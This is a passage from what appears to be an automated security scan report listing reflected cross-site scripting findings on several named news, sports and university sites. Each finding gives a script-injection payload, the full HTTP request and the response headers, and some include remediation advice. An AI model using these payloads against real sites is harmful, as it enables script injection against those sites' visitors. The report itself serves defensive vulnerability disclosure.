<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http:/ ...[SNIP]... <meta property="og:url" content="http://mlb.mlb.com/index.jsp?aec3c"><script>alert(1)</script>eaa73b89501=1&tcid=fb_share" /> ...[SNIP]...
The value of the q request parameter is copied into the HTML document as plain text between tags. The payload ccd91<script>alert(1)</script>c01fa757eda was submitted in the q parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search?q=ccd91<script>alert(1)</script>c01fa757eda&btnG=GO&site=Haas&client=Haas&proxystylesheet=Haas&output=xml_no_dtd HTTP/1.1
Host: search.haas.berkeley.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK
Connection: Close
Cache-Control: private
Content-Type: text/html
Server: GWS/2.1
Date: Wed, 08 Dec 2010 01:12:41 GMT
Content-Length: 6462
The value of the rFreeForm request parameter is copied into an HTML comment. The payload f5a0e--><script>alert(1)</script>64ef3b2d457 was submitted in the rFreeForm parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /portlet/registration/html/info.jsp?rFreeForm=mngi-registration-faqf5a0e--><script>alert(1)</script>64ef3b2d457 HTTP/1.1
Host: secure.www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; JSESSIONID=NYJ0A2DF2B5NKCUUCBWCFFA; s_cc=true; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=280449122501380_1_0.01_0_5_1292194310310; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; __qca=P0-326766520-1291762315669;
<html><head><script><!-- window.focus(); //--></script><link type="text/css" rel="stylesheet" href='https://secure.extras.mnginteractive.com/live/css/MNGiDefaultStyles.css'><script> function o ...[SNIP]... <!-- BEGIN FREEFORM RENDER, ID mngi-registration-faqf5a0e--><script>alert(1)</script>64ef3b2d457 --> ...[SNIP]...
The value of the rPage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18877</script><script>alert(1)</script>c36a3fbc37b was submitted in the rPage parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /registration?rPage=register18877</script><script>alert(1)</script>c36a3fbc37b HTTP/1.1
Host: secure.www.mercurynews.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __g_u=280449122501380_1_0.01_0_5_1292194310310; __qca=P0-326766520-1291762315669; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; UserType=Browser; s_cc=true; s_sq=%5B%5BB%5D%5D; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Registration'><title>Registration - San Jose Mercury News</title><!-- get profile info -->< ...[SNIP]... and = getBrand2(s_account); var PageName = "Registration"; var SectionName = "Registration"; var ArticleTitle = "null"; var FriendlyName = "Registration: register18877</script><script>alert(1)</script>c36a3fbc37b"; var domainName = getDomainName(); userObj = new omniObj(); userObj.load(); userObj.update(); userObj.save(); /* You may give each page an identifying name, server, and cha ...[SNIP]...
The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 15d3b%3balert(1)//efa2ba8e7b5 was submitted in the cb parameter. This input was echoed as 15d3b;alert(1)//efa2ba8e7b5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.86. http://tipd.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://tipd.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4a5d"><script>alert(1)</script>2b49c49b09f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?e4a5d"><script>alert(1)</script>2b49c49b09f=1 HTTP/1.1
Host: tipd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
4.87. http://redcated/INV/iview/255848431/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /INV/iview/255848431/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770c1"><script>alert(1)</script>c7522e6df6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /INV/iview/255848431/direct/01?time=1291762383.966276&click=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0NHE5cXA5NChnaWQkYmZjOWI4ZjgtMDI1NC0xMWUwLWE4MDItYTdhNGRmODYzYTJlLHN0JDEyOTE3NjIzODM5Mjg1NDksc2kkMzAxMDUxLHYkMS4wLGFpZCRMU1pZWEdLSVZTRS0sY3QkMjUseWJ4JFA4R3ZIWlIuNkxSbTllcFl0aDhNQ0EsciQwKSk/1/*&770c1"><script>alert(1)</script>c7522e6df6a=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo&nclick_check=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 549
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 08 Dec 2010 00:33:17 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d78e4'%3b92a1d3fb0f1 was submitted in the REST URL parameter 4. This input was echoed as d78e4';92a1d3fb0f1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034928/directd78e4'%3b92a1d3fb0f1/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic? HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://m.mercurynews.com/cb/473/subscribe.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8099
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 08 Dec 2010 00:33:43 GMT
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 50af7"><script>alert(1)</script>f362e8db181 was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?50af7"><script>alert(1)</script>f362e8db181 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://m.mercurynews.com/cb/473/subscribe.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7921
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 08 Dec 2010 00:33:13 GMT
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a517b'-alert(1)-'e692d5239a was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?a517b'-alert(1)-'e692d5239a HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://m.mercurynews.com/cb/473/subscribe.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7841
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 08 Dec 2010 00:33:14 GMT
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload afa3b"-alert(1)-"327957558af was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?afa3b"-alert(1)-"327957558af HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://m.mercurynews.com/cb/473/subscribe.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7873
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 08 Dec 2010 00:33:14 GMT
4.92. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /NYC/iview/262034928/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db5aa"-alert(1)-"1aee359f408 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?&db5aa"-alert(1)-"1aee359f408=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://m.mercurynews.com/cb/473/subscribe.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8088
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 08 Dec 2010 00:33:22 GMT
4.93. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /NYC/iview/262034928/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43080'-alert(1)-'fca2f4a2c3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?&43080'-alert(1)-'fca2f4a2c3a=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://m.mercurynews.com/cb/473/subscribe.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7888
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 08 Dec 2010 00:33:23 GMT
4.94. http://redcated/NYC/iview/262034928/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://redcated
Path: /NYC/iview/262034928/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd784"><script>alert(1)</script>a2d52e07740 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NYC/iview/262034928/direct/01?click=http://a1.interclick.com/icaid/113483/tid/11c2f773-23f4-4ae4-ac5e-d8af090de8e7/click.ic?&cd784"><script>alert(1)</script>a2d52e07740=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://m.mercurynews.com/cb/473/subscribe.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 8166
Content-Type: text/html
Expires: 0
Connection: close
Date: Wed, 08 Dec 2010 00:33:21 GMT
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ddf0'%3bd0018033e5b was submitted in the REST URL parameter 4. This input was echoed as 7ddf0';d0018033e5b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034929/direct7ddf0'%3bd0018033e5b/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic? HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://www.mercurynews.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 8086 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:40 GMT
The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd442"-alert(1)-"5e518770aae was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?dd442"-alert(1)-"5e518770aae HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 8068 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:13 GMT
The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2bb4"><script>alert(1)</script>845b395784a was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?d2bb4"><script>alert(1)</script>845b395784a HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7909 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:13 GMT
The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4262d'-alert(1)-'fd885f905cf was submitted in the click parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?4262d'-alert(1)-'fd885f905cf HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7861 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:13 GMT
4.99. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/262034929/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4263"><script>alert(1)</script>47a9821c38b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?&e4263"><script>alert(1)</script>47a9821c38b=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7954 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:20 GMT
4.100. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/262034929/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 474bf'-alert(1)-'4af2cfca2fd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?&474bf'-alert(1)-'4af2cfca2fd=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7879 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:22 GMT
4.101. http://redcated/NYC/iview/262034929/direct/01 [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://redcated
Path:
/NYC/iview/262034929/direct/01
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2511"-alert(1)-"82aa410db36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /NYC/iview/262034929/direct/01?click=http://a1.interclick.com/icaid/113481/tid/384706bf-d572-41de-a346-230b539e43c9/click.ic?&c2511"-alert(1)-"82aa410db36=1 HTTP/1.1 Host: redcated Proxy-Connection: keep-alive Referer: http://www.mercurynews.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ID=optout; MUID=34AD5BBBF6FC477CAC5139C76AA247F9
Response
HTTP/1.1 200 OK Cache-Control: no-store Content-Length: 7852 Content-Type: text/html Expires: 0 Connection: close Date: Wed, 08 Dec 2010 00:33:21 GMT
The value of the &t202id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 657cd"><script>alert(1)</script>8d46ffd6598 was submitted in the &t202id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
